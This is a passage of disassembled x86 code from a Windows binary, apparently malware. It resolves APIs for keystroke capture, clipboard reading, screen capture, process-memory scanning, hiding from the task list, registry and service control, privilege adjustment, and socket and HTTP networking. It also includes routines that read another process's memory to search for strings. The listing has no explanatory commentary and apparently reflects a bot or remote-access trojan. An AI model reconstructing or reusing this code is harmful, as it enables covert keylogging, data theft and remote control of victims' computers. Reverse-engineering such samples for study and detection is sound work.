call ds:dword_43F310
loc_409382: ; CODE XREF: sub_409209+170�j
mov edi, [esp+28h+var_4]
jmp loc_4092F8
; ---------------------------------------------------------------------------
loc_40938B: ; CODE XREF: sub_409209+13C�j
xor eax, eax
jmp loc_409306
sub_409209 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409392 proc near ; CODE XREF: sub_409037+F1�p
var_64 = byte ptr -64h
var_60 = dword ptr -60h
var_40 = byte ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2B = byte ptr -2Bh
var_24 = byte ptr -24h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 64h
push esi
xor esi, esi
push [ebp+arg_0]
mov [ebp+var_10], esi
push esi
push 410h
call ds:dword_4240FC ; OpenProcess
cmp eax, esi
mov [ebp+var_4], eax
jnz short loc_4093BB
xor eax, eax
jmp loc_409536
; ---------------------------------------------------------------------------
loc_4093BB: ; CODE XREF: sub_409392+20�j
mov eax, [ebp+arg_4]
push ebx
push edi
mov [eax], esi
lea eax, [ebp+var_64]
push eax
call ds:dword_4240F8 ; GetSystemInfo
push [ebp+var_60]
mov [ebp+var_8], esi
mov esi, ds:dword_4240EC
push 8
call esi ; GetProcessHeap
mov edi, ds:dword_4240E8
push eax
call edi ; RtlAllocateHeap
lea ecx, [ebp+var_8]
mov ebx, ds:dword_4240F4
push ecx
mov [ebp+arg_0], eax
push [ebp+var_60]
push eax
push 7FFDF000h
push [ebp+var_4]
call ebx ; ReadProcessMemory
test eax, eax
jnz short loc_40940B
xor esi, esi
jmp loc_409529
; ---------------------------------------------------------------------------
loc_40940B: ; CODE XREF: sub_409392+70�j
lea eax, [ebp+var_40]
push 1Ch
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+18h]
push [ebp+var_4]
call ds:dword_4240F0 ; VirtualQueryEx
test eax, eax
jz loc_409518
mov ecx, [ebp+var_30]
mov eax, 1000h
and ecx, eax
cmp ecx, eax
jnz loc_409518
test [ebp+var_2B], 1
jnz loc_409518
push [ebp+var_34]
push 8
call esi ; GetProcessHeap
push eax
call edi ; RtlAllocateHeap
mov edi, eax
lea eax, [ebp+var_8]
push eax
mov eax, [ebp+arg_0]
push [ebp+var_34]
mov [ebp+var_C], edi
push edi
push dword ptr [eax+18h]
push [ebp+var_4]
call ebx ; ReadProcessMemory
test eax, eax
jz loc_409518
loc_40946E: ; CODE XREF: sub_409392+112�j
push edi
push offset dword_43E308
call sub_422A52
pop ecx
test eax, eax
pop ecx
jnz short loc_409496
lea eax, [edi+200h]
push eax
push offset dword_43EB08
call sub_422A52
pop ecx
test eax, eax
pop ecx
jz short loc_4094A6
loc_409496: ; CODE XREF: sub_409392+EB�j
mov eax, [ebp+var_34]
mov ecx, [ebp+var_C]
inc edi
add eax, ecx
inc edi
cmp edi, eax
jnb short loc_409518
jmp short loc_40946E
; ---------------------------------------------------------------------------
loc_4094A6: ; CODE XREF: sub_409392+102�j
test edi, edi
jz short loc_409518
lea eax, [ebp+var_14]
push eax
lea eax, [edi+410h]
push eax
call ds:dword_4240B4 ; FileTimeToLocalFileTime
test eax, eax
jz short loc_4094E1
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_14]
push eax
call ds:dword_4240B0 ; FileTimeToSystemTime
test eax, eax
jz short loc_4094E1
mov al, [edi+42Ch]
mov ecx, [ebp+arg_4]
shr eax, 1
and eax, 7Fh
mov [ecx], eax
loc_4094E1: ; CODE XREF: sub_409392+12B�j
; sub_409392+13D�j
movzx eax, word ptr [edi+42Ch]
shr eax, 8
mov ds:dword_43F52C, eax
mov eax, [ebp+arg_0]
mov [ebp+var_10], 1
mov eax, [eax+18h]
sub eax, [ebp+var_C]
lea eax, [eax+edi+434h]
add edi, 434h
mov ds:dword_43F524, eax
mov ds:dword_43F528, edi
loc_409518: ; CODE XREF: sub_409392+90�j
; sub_409392+A2�j ...
push [ebp+arg_0]
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_4240E4 ; RtlFreeHeap
mov esi, [ebp+var_10]
loc_409529: ; CODE XREF: sub_409392+74�j
push [ebp+var_4]
call ds:off_424078
pop edi
mov eax, esi
pop ebx
loc_409536: ; CODE XREF: sub_409392+24�j
pop esi
leave
retn
sub_409392 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409539 proc near ; CODE XREF: sub_409037:loc_40912F�p
var_4C = byte ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_28 = byte ptr -28h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_13 = byte ptr -13h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
push edi
push [ebp+arg_0]
push 0
push 410h
call ds:dword_4240FC ; OpenProcess
test eax, eax
mov [ebp+arg_0], eax
jz loc_40962B
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
lea eax, [ebp+var_4C]
push eax
call ds:dword_4240F8 ; GetSystemInfo
mov ebx, [ebp+var_44]
mov eax, [ebp+var_40]
cmp ebx, eax
mov [ebp+var_C], eax
jnb loc_409622
mov edi, ds:dword_4240EC
loc_409584: ; CODE XREF: sub_409539+E3�j
lea eax, [ebp+var_28]
push 1Ch
push eax
push ebx
push [ebp+arg_0]
call ds:dword_4240F0 ; VirtualQueryEx
test eax, eax
jz short loc_409610
mov edx, [ebp+var_18]
mov ecx, [ebp+var_1C]
mov eax, 1000h
mov [ebp+var_4], ecx
and edx, eax
cmp edx, eax
jnz short loc_409616
test [ebp+var_13], 1
jnz short loc_409616
push ecx
push 8
call edi ; GetProcessHeap
push eax
call ds:dword_4240E8 ; RtlAllocateHeap
mov esi, eax
lea eax, [ebp+var_8]
push eax
and [ebp+var_8], 0
push [ebp+var_1C]
push esi
push ebx
push [ebp+arg_0]
call ds:dword_4240F4 ; ReadProcessMemory
test eax, eax
jz short loc_409602
push offset dword_43E308
push esi
call sub_422A52
pop ecx
test eax, eax
pop ecx
jnz short loc_409602
lea eax, [esi+400h]
push offset dword_43EB08
push eax
call sub_422A52
pop ecx
test eax, eax
pop ecx
jz short loc_409632
loc_409602: ; CODE XREF: sub_409539+9F�j
; sub_409539+B0�j
push esi
push 0
call edi ; GetProcessHeap
push eax
call ds:dword_4240E4 ; RtlFreeHeap
jmp short loc_409616
; ---------------------------------------------------------------------------
loc_409610: ; CODE XREF: sub_409539+5D�j
mov eax, [ebp+var_48]
mov [ebp+var_4], eax
loc_409616: ; CODE XREF: sub_409539+71�j
; sub_409539+77�j ...
add ebx, [ebp+var_4]
cmp ebx, [ebp+var_C]
jb loc_409584
loc_409622: ; CODE XREF: sub_409539+3F�j
push [ebp+arg_0]
call ds:off_424078
loc_40962B: ; CODE XREF: sub_409539+1E�j
xor eax, eax
loc_40962D: ; CODE XREF: sub_409539+134�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_409632: ; CODE XREF: sub_409539+C7�j
add ebx, 800h
lea eax, [esi+800h]
xor ecx, ecx
mov ds:dword_43F524, ebx
mov ds:dword_43F528, eax
cmp [eax], cl
jnz short loc_409654
cmp [eax+1], cl
jz short loc_40965C
loc_409654: ; CODE XREF: sub_409539+114�j
; sub_409539+121�j
inc ecx
inc eax
inc eax
cmp byte ptr [eax], 0
jnz short loc_409654
loc_40965C: ; CODE XREF: sub_409539+119�j
mov eax, [ebp+arg_4]
push [ebp+arg_0]
mov [eax], ecx
call ds:off_424078
push 1
pop eax
jmp short loc_40962D
sub_409539 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40966F proc near ; CODE XREF: sub_409037+135�p
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, ds:dword_43F520
push esi
mov esi, ds:dword_4240EC
push edi
lea ecx, [eax+eax]
lea eax, [eax+eax+2]
mov [ebp+var_6], ax
mov [ebp+var_8], cx
movzx eax, ax
push eax
push 8
call esi ; GetProcessHeap
push eax
call ds:dword_4240E8 ; RtlAllocateHeap
mov ecx, ds:dword_43F520
mov [ebp+var_4], eax
add ecx, ecx
push ecx
push ds:dword_43F528
push eax
call sub_417390
add esp, 0Ch
lea eax, [ebp+var_8]
push eax
mov al, byte ptr ds:dword_43F52C
push eax
call ds:dword_43F30C
push [ebp+var_4]
mov edi, offset dword_43F318
push offset dword_43E308
push offset dword_43EB08
push [ebp+arg_0]
push offset unk_42CDC0
push 200h
push edi
call sub_41782A
add esp, 1Ch
push [ebp+var_4]
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_4240E4 ; RtlFreeHeap
mov eax, edi
pop edi
pop esi
leave
retn
sub_40966F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409706 proc near ; CODE XREF: sub_409037:loc_409173�p
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov eax, ds:dword_43F520
push ebx
push esi
push edi
lea ecx, [eax+eax]
lea eax, [eax+eax+2]
mov [ebp+var_16], ax
mov [ebp+var_18], cx
movzx eax, ax
push eax
push 8
call ds:dword_4240EC ; GetProcessHeap
push eax
call ds:dword_4240E8 ; RtlAllocateHeap
and [ebp+var_C], 0
mov [ebp+var_14], eax
mov ebx, offset dword_43EB08
mov edi, 200h
mov esi, offset dword_43E108
loc_40974C: ; CODE XREF: sub_409706+FA�j
mov eax, ds:dword_43F520
add eax, eax
push eax
push ds:dword_43F528
push [ebp+var_14]
call sub_417390
add esp, 0Ch
lea eax, [ebp+var_18]
push eax
push [ebp+var_C]
call ds:dword_43F30C
mov eax, ds:dword_43F520
and [ebp+var_10], 0
mov ecx, [ebp+var_14]
mov [ebp+var_8], 1
test eax, eax
jbe short loc_4097C1
loc_409789: ; CODE XREF: sub_409706+B3�j
cmp [ebp+var_8], 0
jz short loc_4097DE
mov dl, [ecx]
test dl, dl
mov [ebp+var_1], dl
jz short loc_4097AD
cmp byte ptr [ecx+1], 0
jnz short loc_4097AD
cmp dl, 20h
jnb short loc_4097A7
and [ebp+var_8], 0
loc_4097A7: ; CODE XREF: sub_409706+9B�j
cmp [ebp+var_1], 7Eh
jbe short loc_4097B1
loc_4097AD: ; CODE XREF: sub_409706+90�j
; sub_409706+96�j
and [ebp+var_8], 0
loc_4097B1: ; CODE XREF: sub_409706+A5�j
inc ecx
inc ecx
inc [ebp+var_10]
cmp [ebp+var_10], eax
jb short loc_409789
cmp [ebp+var_8], 0
jz short loc_4097DE
loc_4097C1: ; CODE XREF: sub_409706+81�j
push [ebp+var_14]
push offset dword_43E308
push ebx
push [ebp+arg_0]
push offset unk_42CDC0
push edi
push esi
call sub_41782A
add esp, 1Ch
jmp short loc_4097F6
; ---------------------------------------------------------------------------
loc_4097DE: ; CODE XREF: sub_409706+87�j
; sub_409706+B9�j
push offset dword_43E308
push ebx
push [ebp+arg_0]
push offset unk_42CE2C
push edi
push esi
call sub_41782A
add esp, 18h
loc_4097F6: ; CODE XREF: sub_409706+D6�j
inc [ebp+var_C]
cmp [ebp+var_C], 0FFh
jbe loc_40974C
push [ebp+var_14]
push 0
call ds:dword_4240EC ; GetProcessHeap
push eax
call ds:dword_4240E4 ; RtlFreeHeap
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_409706 endp
; =============== S U B R O U T I N E =======================================
sub_40981F proc near ; CODE XREF: sub_40E6A9+48�p
push ebx
push ebp
mov ebp, ds:off_424100
push esi
push edi
push offset aKernel32_dll_1 ; "kernel32.dll"
call ebp ; sub_49BF8C
mov esi, ds:off_4240DC
mov edi, eax
xor ebx, ebx
cmp edi, ebx
jz loc_40993F
push offset aSeterrormode ; "SetErrorMode"
push edi
call esi ; sub_49C076
push offset aCreatetoolhelp ; "CreateToolhelp32Snapshot"
push edi
mov ds:dword_43F714, eax
call esi ; sub_49C076
push offset aProcess32first ; "Process32First"
push edi
mov ds:dword_43F688, eax
call esi ; sub_49C076
push offset aProcess32next ; "Process32Next"
push edi
mov ds:dword_43F66C, eax
call esi ; sub_49C076
push offset aModule32first ; "Module32First"
push edi
mov ds:dword_43F588, eax
call esi ; sub_49C076
push offset aGetdiskfreespa ; "GetDiskFreeSpaceExA"
push edi
mov ds:dword_43F534, eax
call esi ; sub_49C076
push offset aGetlogicaldriv ; "GetLogicalDriveStringsA"
push edi
mov ds:dword_43F564, eax
call esi ; sub_49C076
push offset aGetdrivetypea ; "GetDriveTypeA"
push edi
mov ds:dword_43F5D8, eax
call esi ; sub_49C076
push offset aSearchpatha ; "SearchPathA"
push edi
mov ds:dword_43F6C8, eax
call esi ; sub_49C076
push offset aQueryperforman ; "QueryPerformanceCounter"
push edi
mov ds:off_43F724, eax
call esi ; sub_49C076
push offset aQueryperform_0 ; "QueryPerformanceFrequency"
push edi
mov ds:dword_43F594, eax
call esi ; sub_49C076
cmp ds:dword_43F714, ebx
mov ds:dword_43F57C, eax
jz short loc_40991D
cmp ds:dword_43F688, ebx
jz short loc_40991D
cmp ds:dword_43F66C, ebx
jz short loc_40991D
cmp ds:dword_43F588, ebx
jz short loc_40991D
cmp ds:dword_43F564, ebx
jz short loc_40991D
cmp ds:dword_43F5D8, ebx
jz short loc_40991D
cmp ds:dword_43F6C8, ebx
jz short loc_40991D
cmp ds:off_43F724, ebx
jz short loc_40991D
cmp ds:dword_43F594, ebx
jz short loc_40991D
cmp eax, ebx
jnz short loc_409927
loc_40991D: ; CODE XREF: sub_40981F+B8�j
; sub_40981F+C0�j ...
mov ds:dword_43F728, 1
loc_409927: ; CODE XREF: sub_40981F+FC�j
push offset aRegisterservic ; "RegisterServiceProcess"
push edi
call esi ; sub_49C076
cmp eax, ebx
mov ds:dword_43F6A0, eax
jz short loc_409954
push 1
push ebx
call eax
jmp short loc_409954
; ---------------------------------------------------------------------------
loc_40993F: ; CODE XREF: sub_40981F+1D�j
call ds:dword_42408C ; RtlGetLastWin32Error
mov ds:dword_43F72C, eax
mov ds:dword_43F728, 1
loc_409954: ; CODE XREF: sub_40981F+117�j
; sub_40981F+11E�j
push offset aUser32_dll ; "user32.dll"
call ds:off_4240E0
mov edi, eax
cmp edi, ebx
jz loc_409A69
push offset aSendmessagea ; "SendMessageA"
push edi
call esi ; sub_49C076
push offset aFindwindowa ; "FindWindowA"
push edi
mov ds:dword_43F6C4, eax
call esi ; sub_49C076
push offset aIswindow ; "IsWindow"
push edi
mov ds:dword_43F674, eax
call esi ; sub_49C076
push offset aDestroywindow ; "DestroyWindow"
push edi
mov ds:dword_43F608, eax
call esi ; sub_49C076
push offset aOpenclipboard ; "OpenClipboard"
push edi
mov ds:dword_43F718, eax
call esi ; sub_49C076
push offset aGetclipboardda ; "GetClipboardData"
push edi
mov ds:dword_43F638, eax
call esi ; sub_49C076
push offset aCloseclipboard ; "CloseClipboard"
push edi
mov ds:dword_43F658, eax
call esi ; sub_49C076
push offset aExitwindowsex ; "ExitWindowsEx"
push edi
mov ds:dword_43F6BC, eax
call esi ; sub_49C076
cmp ds:dword_43F6C4, ebx
mov ds:dword_43F5B0, eax
jz short loc_409A0D
cmp ds:dword_43F674, ebx
jz short loc_409A0D
cmp ds:dword_43F608, ebx
jz short loc_409A0D
cmp ds:dword_43F718, ebx
jz short loc_409A0D
cmp ds:dword_43F638, ebx
jz short loc_409A0D
cmp ds:dword_43F658, ebx
jz short loc_409A0D
cmp ds:dword_43F6BC, ebx
jz short loc_409A0D
cmp eax, ebx
jnz short loc_409A17
loc_409A0D: ; CODE XREF: sub_40981F+1B8�j
; sub_40981F+1C0�j ...
mov ds:dword_43F730, 1
loc_409A17: ; CODE XREF: sub_40981F+1EC�j
push offset aGetasynckeysta ; "GetAsyncKeyState"
push edi
call esi ; sub_49C076
push offset aGetkeystate ; "GetKeyState"
push edi
mov ds:dword_43F634, eax
call esi ; sub_49C076
push offset aGetwindowtexta ; "GetWindowTextA"
push edi
mov ds:dword_43F548, eax
call esi ; sub_49C076
push offset aGetforegroundw ; "GetForegroundWindow"
push edi
mov ds:dword_43F604, eax
call esi ; sub_49C076
cmp ds:dword_43F634, ebx
mov ds:dword_43F5F0, eax
jz short loc_409A74
cmp ds:dword_43F548, ebx
jz short loc_409A74
cmp ds:dword_43F604, ebx
jz short loc_409A74
cmp eax, ebx
jnz short loc_409A7E
jmp short loc_409A74
; ---------------------------------------------------------------------------
loc_409A69: ; CODE XREF: sub_40981F+144�j
call ds:dword_42408C ; RtlGetLastWin32Error
mov ds:dword_43F734, eax
loc_409A74: ; CODE XREF: sub_40981F+232�j
; sub_40981F+23A�j ...
mov ds:dword_43F730, 1
loc_409A7E: ; CODE XREF: sub_40981F+246�j
push offset aAdvapi32_dll ; "advapi32.dll"
call ebp ; sub_49BF8C
mov edi, eax
cmp edi, ebx
jz loc_409C19
push offset aRegopenkeyexa ; "RegOpenKeyExA"
push edi
call esi ; sub_49C076
push offset aRegcreatekeyex ; "RegCreateKeyExA"
push edi
mov ds:dword_43F6D8, eax
call esi ; sub_49C076
push offset aRegsetvalueexa ; "RegSetValueExA"
push edi
mov ds:dword_43F61C, eax
call esi ; sub_49C076
push offset aRegqueryvaluee ; "RegQueryValueExA"
push edi
mov ds:dword_43F68C, eax
call esi ; sub_49C076
push offset aRegdeletevalue ; "RegDeleteValueA"
push edi
mov ds:dword_43F574, eax
call esi ; sub_49C076
push offset aRegclosekey ; "RegCloseKey"
push edi
mov ds:dword_43F5D4, eax
call esi ; sub_49C076
cmp ds:dword_43F6D8, ebx
mov ds:dword_43F644, eax
jz short loc_409B09
cmp ds:dword_43F61C, ebx
jz short loc_409B09
cmp ds:dword_43F68C, ebx
jz short loc_409B09
cmp ds:dword_43F574, ebx
jz short loc_409B09
cmp ds:dword_43F5D4, ebx
jz short loc_409B09
cmp eax, ebx
jnz short loc_409B13
loc_409B09: ; CODE XREF: sub_40981F+2C4�j
; sub_40981F+2CC�j ...
mov ds:dword_43F738, 1
loc_409B13: ; CODE XREF: sub_40981F+2E8�j
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; sub_49C076
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
mov ds:dword_43F64C, eax
call esi ; sub_49C076
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
mov ds:dword_43F624, eax
call esi ; sub_49C076
cmp ds:dword_43F64C, ebx
mov ds:dword_43F6D4, eax
jz short loc_409B4E
cmp ds:dword_43F624, ebx
jz short loc_409B4E
cmp eax, ebx
jnz short loc_409B58
loc_409B4E: ; CODE XREF: sub_40981F+321�j
; sub_40981F+329�j
mov ds:dword_43F738, 1
loc_409B58: ; CODE XREF: sub_40981F+32D�j
push offset aOpenscmanagera ; "OpenSCManagerA"
push edi
call esi ; sub_49C076
push offset aOpenservicea ; "OpenServiceA"
push edi
mov ds:dword_43F65C, eax
call esi ; sub_49C076
push offset aStartservicea ; "StartServiceA"
push edi
mov ds:dword_43F550, eax
call esi ; sub_49C076
push offset aControlservice ; "ControlService"
push edi
mov ds:dword_43F558, eax
call esi ; sub_49C076
push offset aDeleteservice ; "DeleteService"
push edi
mov ds:dword_43F5B8, eax
call esi ; sub_49C076
push offset aCloseserviceha ; "CloseServiceHandle"
push edi
mov ds:dword_43F5BC, eax
call esi ; sub_49C076
push offset aEnumservicesst ; "EnumServicesStatusA"
push edi
mov ds:dword_43F56C, eax
call esi ; sub_49C076
push offset aIsvalidsecurit ; "IsValidSecurityDescriptor"
push edi
mov ds:dword_43F628, eax
call esi ; sub_49C076
cmp ds:dword_43F65C, ebx
mov ds:dword_43F55C, eax
jz short loc_409BFC
cmp ds:dword_43F550, ebx
jz short loc_409BFC
cmp ds:dword_43F558, ebx
jz short loc_409BFC
cmp ds:dword_43F5B8, ebx
jz short loc_409BFC
cmp ds:dword_43F5BC, ebx
jz short loc_409BFC
cmp ds:dword_43F56C, ebx
jz short loc_409BFC
cmp ds:dword_43F628, ebx
jz short loc_409BFC
cmp eax, ebx
jnz short loc_409C06
loc_409BFC: ; CODE XREF: sub_40981F+3A7�j
; sub_40981F+3AF�j ...
mov ds:dword_43F738, 1
loc_409C06: ; CODE XREF: sub_40981F+3DB�j
push offset aGetusernamea ; "GetUserNameA"
push edi
call esi ; sub_49C076
cmp eax, ebx
mov ds:dword_43F554, eax
jnz short loc_409C2E
jmp short loc_409C24
; ---------------------------------------------------------------------------
loc_409C19: ; CODE XREF: sub_40981F+26A�j
call ds:dword_42408C ; RtlGetLastWin32Error
mov ds:dword_43F73C, eax
loc_409C24: ; CODE XREF: sub_40981F+3F8�j
mov ds:dword_43F738, 1
loc_409C2E: ; CODE XREF: sub_40981F+3F6�j
push offset aGdi32_dll ; "gdi32.dll"
call ebp ; sub_49BF8C
mov edi, eax
cmp edi, ebx
jz loc_409CFA
push offset aCreatedca ; "CreateDCA"
push edi
call esi ; sub_49C076
push offset aCreatedibsecti ; "CreateDIBSection"
push edi
mov ds:dword_43F654, eax
call esi ; sub_49C076
push offset aCreatecompatib ; "CreateCompatibleDC"
push edi
mov ds:dword_43F6AC, eax
call esi ; sub_49C076
push offset aGetdevicecaps ; "GetDeviceCaps"
push edi
mov ds:dword_43F6B4, eax
call esi ; sub_49C076
push offset aGetdibcolortab ; "GetDIBColorTable"
push edi
mov ds:dword_43F670, eax
call esi ; sub_49C076
push offset aSelectobject ; "SelectObject"
push edi
mov ds:dword_43F598, eax
call esi ; sub_49C076
push offset aBitblt ; "BitBlt"
push edi
mov ds:dword_43F544, eax
call esi ; sub_49C076
push offset aDeletedc ; "DeleteDC"
push edi
mov ds:dword_43F6B0, eax
call esi ; sub_49C076
push offset aDeleteobject ; "DeleteObject"
push edi
mov ds:dword_43F530, eax
call esi ; sub_49C076
cmp ds:dword_43F654, ebx
mov ds:dword_43F5CC, eax
jz short loc_409D05
cmp ds:dword_43F6AC, ebx
jz short loc_409D05
cmp ds:dword_43F6B4, ebx
jz short loc_409D05
cmp ds:dword_43F670, ebx
jz short loc_409D05
cmp ds:dword_43F598, ebx
jz short loc_409D05
cmp ds:dword_43F544, ebx
jz short loc_409D05
cmp ds:dword_43F6B0, ebx
jz short loc_409D05
cmp ds:dword_43F530, ebx
jz short loc_409D05
cmp eax, ebx
jnz short loc_409D0F
jmp short loc_409D05
; ---------------------------------------------------------------------------
loc_409CFA: ; CODE XREF: sub_40981F+41A�j
call ds:dword_42408C ; RtlGetLastWin32Error
mov ds:dword_43F744, eax
loc_409D05: ; CODE XREF: sub_40981F+49B�j
; sub_40981F+4A3�j ...
mov ds:dword_43F740, 1
loc_409D0F: ; CODE XREF: sub_40981F+4D7�j
mov ebp, ds:off_4240E0
push offset aWs2_32_dll ; "ws2_32.dll"
call ebp ; sub_49BE83
mov edi, eax
cmp edi, ebx
jz loc_409FCB
push offset aWsastartup ; "WSAStartup"
push edi
call esi ; sub_49C076
push offset aWsasocketa ; "WSASocketA"
push edi
mov ds:dword_43F5E0, eax
call esi ; sub_49C076
push offset aWsaasyncselect ; "WSAAsyncSelect"
push edi
mov ds:dword_43F70C, eax
call esi ; sub_49C076
push offset a__wsafdisset ; "__WSAFDIsSet"
push edi
mov ds:dword_43F584, eax
call esi ; sub_49C076
push offset aWsaioctl ; "WSAIoctl"
push edi
mov ds:dword_43F560, eax
call esi ; sub_49C076
push offset aWsagetlasterro ; "WSAGetLastError"
push edi
mov ds:dword_43F614, eax
call esi ; sub_49C076
push offset aWsacleanup ; "WSACleanup"
push edi
mov ds:dword_43F5FC, eax
call esi ; sub_49C076
push offset aSocket ; "socket"
push edi
mov ds:dword_43F5C8, eax
call esi ; sub_49C076
push offset aIoctlsocket ; "ioctlsocket"
push edi
mov ds:dword_43F6E8, eax
call esi ; sub_49C076
push offset aConnect ; "connect"
push edi
mov ds:dword_43F704, eax
call esi ; sub_49C076
push offset aInet_ntoa ; "inet_ntoa"
push edi
mov ds:dword_43F610, eax
call esi ; sub_49C076
push offset aInet_addr ; "inet_addr"
push edi
mov ds:dword_43F6F4, eax
call esi ; sub_49C076
push offset aHtons ; "htons"
push edi
mov ds:dword_43F6A8, eax
call esi ; sub_49C076
push offset aHtonl ; "htonl"
push edi
mov ds:dword_43F668, eax
call esi ; sub_49C076
push offset aNtohs ; "ntohs"
push edi
mov ds:dword_43F664, eax
call esi ; sub_49C076
push offset aNtohl ; "ntohl"
push edi
mov ds:dword_43F5A4, eax
call esi ; sub_49C076
push offset aSend ; "send"
push edi
mov ds:dword_43F59C, eax
call esi ; sub_49C076
push offset aSendto ; "sendto"
push edi
mov ds:dword_43F6B8, eax
call esi ; sub_49C076
push offset aRecv ; "recv"
push edi
mov ds:dword_43F6CC, eax
call esi ; sub_49C076
push offset aRecvfrom ; "recvfrom"
push edi
mov ds:dword_43F680, eax
call esi ; sub_49C076
mov ds:dword_43F640, eax
push offset aBind ; "bind"
push edi
call esi ; sub_49C076
push offset aSelect ; "select"
push edi
mov ds:dword_43F694, eax
call esi ; sub_49C076
push offset aListen ; "listen"
push edi
mov ds:dword_43F650, eax
call esi ; sub_49C076
push offset aAccept ; "accept"
push edi
mov ds:dword_43F690, eax
call esi ; sub_49C076
push offset aSetsockopt ; "setsockopt"
push edi
mov ds:dword_43F6FC, eax
call esi ; sub_49C076
push offset aGetsockname ; "getsockname"
push edi
mov ds:dword_43F648, eax
call esi ; sub_49C076
push offset aGethostname ; "gethostname"
push edi
mov ds:dword_43F60C, eax
call esi ; sub_49C076
push offset aGethostbyname ; "gethostbyname"
push edi
mov ds:dword_43F67C, eax
call esi ; sub_49C076
push offset aGethostbyaddr ; "gethostbyaddr"
push edi
mov ds:dword_43F6EC, eax
call esi ; sub_49C076
push offset aGetpeername ; "getpeername"
push edi
mov ds:dword_43F620, eax
call esi ; sub_49C076
push offset aClosesocket ; "closesocket"
push edi
mov ds:dword_43F5C4, eax
call esi ; sub_49C076
cmp ds:dword_43F5E0, ebx
mov ds:dword_43F700, eax
jz loc_409FD6
cmp ds:dword_43F70C, ebx
jz loc_409FD6
cmp ds:dword_43F584, ebx
jz loc_409FD6
cmp ds:dword_43F614, ebx
jz loc_409FD6
cmp ds:dword_43F5FC, ebx
jz loc_409FD6
cmp ds:dword_43F5C8, ebx
jz loc_409FD6
cmp ds:dword_43F6E8, ebx
jz loc_409FD6
cmp ds:dword_43F704, ebx
jz loc_409FD6
cmp ds:dword_43F610, ebx
jz loc_409FD6
cmp ds:dword_43F6F4, ebx
jz loc_409FD6
cmp ds:dword_43F6A8, ebx
jz loc_409FD6
cmp ds:dword_43F668, ebx
jz loc_409FD6
cmp ds:dword_43F664, ebx
jz loc_409FD6
cmp ds:dword_43F5A4, ebx
jz short loc_409FD6
cmp ds:dword_43F6B8, ebx
jz short loc_409FD6
cmp ds:dword_43F6CC, ebx
jz short loc_409FD6
cmp ds:dword_43F680, ebx
jz short loc_409FD6
cmp ds:dword_43F640, ebx
jz short loc_409FD6
cmp ds:dword_43F694, ebx
jz short loc_409FD6
cmp ds:dword_43F650, ebx
jz short loc_409FD6
cmp ds:dword_43F690, ebx
jz short loc_409FD6
cmp ds:dword_43F6FC, ebx
jz short loc_409FD6
cmp ds:dword_43F648, ebx
jz short loc_409FD6
cmp ds:dword_43F60C, ebx
jz short loc_409FD6
cmp ds:dword_43F67C, ebx
jz short loc_409FD6
cmp ds:dword_43F6EC, ebx
jz short loc_409FD6
cmp ds:dword_43F620, ebx
jz short loc_409FD6
cmp eax, ebx
jnz short loc_409FE0
jmp short loc_409FD6
; ---------------------------------------------------------------------------
loc_409FCB: ; CODE XREF: sub_40981F+501�j
call ds:dword_42408C ; RtlGetLastWin32Error
mov ds:dword_43F74C, eax
loc_409FD6: ; CODE XREF: sub_40981F+6A0�j
; sub_40981F+6AC�j ...
mov ds:dword_43F748, 1
loc_409FE0: ; CODE XREF: sub_40981F+7A8�j
push offset aWininet_dll ; "wininet.dll"
call ebp ; sub_49BE83
mov edi, eax
cmp edi, ebx
jz loc_40A0E5
push offset aInternetgetcon ; "InternetGetConnectedState"
push edi
call esi ; sub_49C076
push offset aInternetgetc_0 ; "InternetGetConnectedStateEx"
push edi
mov ds:dword_43F5AC, eax
call esi ; sub_49C076
push offset aHttpopenreques ; "HttpOpenRequestA"
push edi
mov ds:dword_43F538, eax
call esi ; sub_49C076
push offset aHttpsendreques ; "HttpSendRequestA"
push edi
mov ds:dword_43F630, eax
call esi ; sub_49C076
push offset aInternetconnec ; "InternetConnectA"
push edi
mov ds:dword_43F5E4, eax
call esi ; sub_49C076
push offset aInternetopena ; "InternetOpenA"
push edi
mov ds:dword_43F63C, eax
call esi ; sub_49C076
push offset aInternetopenur ; "InternetOpenUrlA"
push edi
mov ds:dword_43F600, eax
call esi ; sub_49C076
push offset aInternetcracku ; "InternetCrackUrlA"
push edi
mov ds:dword_43F578, eax
call esi ; sub_49C076
push offset aInternetreadfi ; "InternetReadFile"
push edi
mov ds:dword_43F570, eax
call esi ; sub_49C076
push offset aInternetcloseh ; "InternetCloseHandle"
push edi
mov ds:dword_43F580, eax
call esi ; sub_49C076
cmp ds:dword_43F5AC, ebx
mov ecx, ds:dword_43F600
mov ds:dword_43F69C, eax
jz short loc_40A0C1
cmp ds:dword_43F538, ebx
jz short loc_40A0C1
cmp ds:dword_43F630, ebx
jz short loc_40A0C1
